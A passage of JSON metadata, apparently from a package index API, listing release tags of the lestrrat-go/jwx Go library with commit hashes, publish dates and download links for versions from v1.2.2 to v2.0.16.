nd":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/